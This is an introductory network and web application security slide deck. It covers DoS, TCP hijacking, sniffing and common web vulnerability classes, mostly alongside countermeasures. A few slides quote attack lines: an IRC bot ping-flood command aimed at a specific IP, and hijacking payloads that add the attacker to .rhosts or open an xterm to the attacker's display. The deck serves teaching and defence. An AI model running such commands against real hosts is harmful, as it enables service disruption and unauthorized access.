Download - Oss web application and network security
![Page 1: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/1.jpg)
Web Application and network security
Rishabh Mehan
![Page 2: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/2.jpg)
Saying Hello !!To start off with the introduction lets go through
few basicsWhat is a Web Application ?Where is it Deployed ?How can it be reached ?
![Page 3: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/3.jpg)
Web Application
![Page 4: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/4.jpg)
ProtocolsHTTP – HTTPS
FTP – SFTP
TCP
SSH
![Page 5: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/5.jpg)
Request MethodsGET POST
Form data encoded in the URL Data is included in the body of the request
GET http://www.mysite.com/kgsearch/search.php?catid=1 HTTP/1.1
Host: www.mysite.comUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5Accept-Language: en-us,en;q=0.5Accept-Encoding: gzip,deflateAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Keep-Alive: 300Connection: keep-aliveReferer: http://www.mysite.com/
POST http://www.mysite.com/kgsearch/search.php HTTP/1.1Host: www.mysite.comUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5Accept-Language: en-us,en;q=0.5Accept-Encoding: gzip,deflateAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Keep-Alive: 300Connection: keep-aliveReferer: http://www.mysite.com/
catid=1
![Page 6: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/6.jpg)
How Request flows
Request
Response
Server
www.mybank.com
(64.58.76.230)
Port: 80Client PC
(10.1.0.123)
![Page 7: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/7.jpg)
Words of Wisdom“Every program has at least two purposes: the one
for which it was written, and another for which it wasn't.”
-Alan J. Perlis
![Page 8: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/8.jpg)
![Page 9: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/9.jpg)
infrastructure
Browser
Web Servers
Presentation Layer
Media Store
Very complex architectures, multiple platforms, multiple protocols
Database Server
Customer Identification
Access Controls
Transaction Information
Core Business Data
Wireless
Application Server
Business Logic
Content Services
Network
HTTP
Web Application
![Page 10: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/10.jpg)
Why vulnerabilities
“As an Application Developer, I can build great features and functions while meeting deadlines, but I don’t know how to develop my web application with security as a feature.”
The Web ApplicationSecurity Gap
“As a Network Security Professional, I don’t know how my companies web applications are supposed to work so I deploy a protective solution…but don’t know if it’s protecting what it’s supposed to.”
Application Developers and QA Professionals Don’t Know Security
Security Professionals Don’t Know The Applications
![Page 11: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/11.jpg)
Common security attacks and their countermeasures
Finding a way into the network Firewalls
Exploiting software bugs, buffer overflows Intrusion Detection Systems
Denial of Service Ingress filtering, IDS
TCP hijacking IPSec
Packet sniffing Encryption (SSH, SSL, HTTPS)
Social problems Education
![Page 12: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/12.jpg)
FirewallsBasic problem – many network applications and
protocols have security problems that are fixed over timeDifficult for users to keep up with changes and
keep host secureSolution
Administrators limit access to end hosts by using a firewall
Firewall is kept up-to-date by administrators
![Page 13: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/13.jpg)
Firewalls
Intranet
DMZInternet
Firew
all
Firew
allWeb server, email server, web proxy, etc
![Page 14: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/14.jpg)
FirewallsWhat does a firewall rule look like?
Depends on the firewall used
Example: ipfw /sbin/ipfw add deny tcp from cracker.evil.org
to wolf.tambov.su telnet
Other examples: WinXP & Mac OS X have built in and third party firewallsDifferent graphical user interfacesVarying amounts of complexity and power
![Page 15: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/15.jpg)
Denial of ServicePurpose: Make a network service unusable,
usually by overloading the server or network
Many different kinds of DoS attacksSYN floodingSMURFDistributed attacks
![Page 16: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/16.jpg)
Denial of ServiceSYN flooding attack
Send SYN packets with bogus source addressWhy?
Server responds with SYN ACK and keeps state about TCP half-open connectionEventually, server memory is exhausted with this state
Solution: use “SYN cookies” In response to a SYN, create a special “cookie” for the
connection, and forget everything elseThen, can recreate the forgotten information when the
ACK comes in from a legitimate connection
![Page 17: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/17.jpg)
Denial of Service
![Page 18: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/18.jpg)
Denial of ServiceSMURF
Source IP address of a broadcast ping is forgedLarge number of machines respond back to victim,
overloading it
![Page 19: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/19.jpg)
Denial of Service
![Page 20: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/20.jpg)
Denial of ServiceDistributed Denial of Service
Same techniques as regular DoS, but on a much larger scale
Example: Sub7Server Trojan and IRC bots Infect a large number of machines with a “zombie” programZombie program logs into an IRC channel and awaits
commandsExample:
Bot command: !p4 207.71.92.193 Result: runs ping.exe 207.71.92.193 -l 65500 -n 10000 Sends 10,000 64k packets to the host (655MB!)
Read more at: http://grc.com/dos/grcdos.htm
![Page 21: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/21.jpg)
TCP AttacksRecall how IP works…
End hosts create IP packets and routers process them purely based on destination address alone
Problem: End hosts may lie about other fields which do not affect deliverySource address – host may trick destination into
believing that the packet is from a trusted sourceEspecially applications which use IP addresses as a
simple authentication methodSolution – use better authentication methods
![Page 22: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/22.jpg)
TCP AttacksTCP connections have associated state
Starting sequence numbers, port numbers
Problem – what if an attacker learns these values?Port numbers are sometimes well known to begin
with (ex. HTTP uses port 80)Sequence numbers are sometimes chosen in very
predictable ways
![Page 23: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/23.jpg)
TCP AttacksIf an attacker learns the associated TCP state for
the connection, then the connection can be hijacked!
Attacker can insert malicious data into the TCP stream, and the recipient will believe it came from the original sourceEx. Instead of downloading and running new
program, you download a virus and execute it
![Page 24: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/24.jpg)
TCP AttacksSay hello to Alice, Bob and Mr. Big Ears
![Page 25: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/25.jpg)
TCP AttacksAlice and Bob have an established TCP
connection
![Page 26: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/26.jpg)
TCP AttacksMr. Big Ears lies on the path between Alice and
Bob on the networkHe can intercept all of their packets
![Page 27: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/27.jpg)
TCP AttacksFirst, Mr. Big Ears must drop all of Alice’s packets
since they must not be delivered to Bob (why?)
Packets
The Void
![Page 28: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/28.jpg)
TCP AttacksThen, Mr. Big Ears sends his malicious packet
with the next ISN (sniffed from the network)
ISN, SRC=Alice
![Page 29: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/29.jpg)
TCP AttacksWhat if Mr. Big Ears is unable to sniff the packets
between Alice and Bob?Can just DoS Alice instead of dropping her packetsCan just send guesses of what the ISN is until it is
accepted
How do you know when the ISN is accepted?Mitnick: payload is “add self to .rhosts”Or, “xterm -display MrBigEars:0”
![Page 30: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/30.jpg)
TCP AttacksWhy are these types of TCP attacks so
dangerous?
Web server
Malicious user
Trusting web client
![Page 31: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/31.jpg)
TCP AttacksHow do we prevent this?
IPSecProvides source authentication, so Mr. Big Ears
cannot pretend to be AliceEncrypts data before transport, so Mr. Big Ears
cannot talk to Bob without knowing what the session key is
![Page 32: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/32.jpg)
Packet SniffingRecall how Ethernet works …
When someone wants to send a packet to some else …
They put the bits on the wire with the destination MAC address …
And remember that other hosts are listening on the wire to detect for collisions …
It couldn’t get any easier to figure out what data is being transmitted over the network!
![Page 33: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/33.jpg)
Packet Sniffing How can we protect ourselves?
SSH, not Telnet Many people at CMU still use Telnet and send their password in the
clear (use PuTTY instead!) Now that I have told you this, please do not exploit this information Packet sniffing is, by the way, prohibited by Computing Services
HTTP over SSL Especially when making purchases with credit cards!
SFTP, not FTP Unless you really don’t care about the password or data Can also use KerbFTP (download from MyAndrew)
IPSec Provides network-layer confidentiality
![Page 34: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/34.jpg)
Application Mapping
Cookie Manipulation
Custom Application Scripting
Parameter Manipulation
Reverse Directory Transversal
Brute Force
Application Mapping
Cookie Poisoning/Theft
Buffer Overflow
SQL Injection
Cross-site scripting
Web Application Vulnerabilities
Platform
Administration
Application
Known Vulnerabilities
Extension Checking
Common File Checks
Data Extension Checking
Backup Checking
Directory Enumeration
Path Truncation
Hidden Web Paths
Forceful Browsing
Web application vulnerabilities occur in multiple areas.
![Page 35: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/35.jpg)
What the #@$& is happening ???
XSS
SQL Injection
Auth
Input Valdation
File Include
Info Disclosure
0 5 10 15 20 25 30 35 40 45 50
XSS
SQL Injec-tion
Auth
Input Valda-tion
File Include
Info Dis-closure; 3
%
%
Axis Title
Axis Title
![Page 36: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/36.jpg)
PlatformKnown Vulnerabilities
Web Application Vulnerabilities
Platform:Known vulnerabilities can
be exploited immediately with a minimum amount of skill or experience – “script kiddies”
Most easily defendable of all web vulnerabilities
MUST have streamlined patching procedures
![Page 37: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/37.jpg)
AdministrationExtension Checking
Common File Checks
Data Extension Checking
Backup Checking
Directory Enumeration
Path Truncation
Hidden Web Paths
Forceful Browsing
Administration:• Less easily corrected than
known issues• Require increased awareness• More than just configuration,
must be aware of security flaws in actual content
• Remnant files can reveal applications and versions in use
• Backup files can reveal source code and database connection strings
Web Application Vulnerabilities
![Page 38: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/38.jpg)
AdministrationAdministration
Application Programming:• Common coding techniques do not
necessarily include security• Input is assumed to be valid, but not
tested • Unexamined input from a browser can
inject scripts into page for replay against later visitors
• Unhandled error messages reveal application and database structures
• Unchecked database calls can be ‘piggybacked’ with a hacker’s own database call, giving direct access to business data through a web browser
Application
Application Mapping
Cookie Manipulation
Custom Application Scripting
Parameter Manipulation
Reverse Directory Transversal
Brute Force
Application Mapping
Cookie Poisoning/Theft
Buffer Overflow
SQL Injection
Cross-site scripting
Web Application Vulnerabilities
![Page 39: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/39.jpg)
Exampleshttp://demo.testfire.net/
http://chat.wallhood.com/moving/moving/images/
![Page 40: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/40.jpg)
How to Secure Web Applications
Incorporate security into the lifecycleApply information security principles
to all software development efforts
EducateIssue awareness, Training, etc…
![Page 41: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/41.jpg)
Are We still Secure ?
LOLNO
![Page 42: Oss web application and network security](https://reader031.vdocuments.us/reader031/viewer/2022013102/546c3c56b4af9f612c8b4f2c/html5/thumbnails/42.jpg)
Questions ?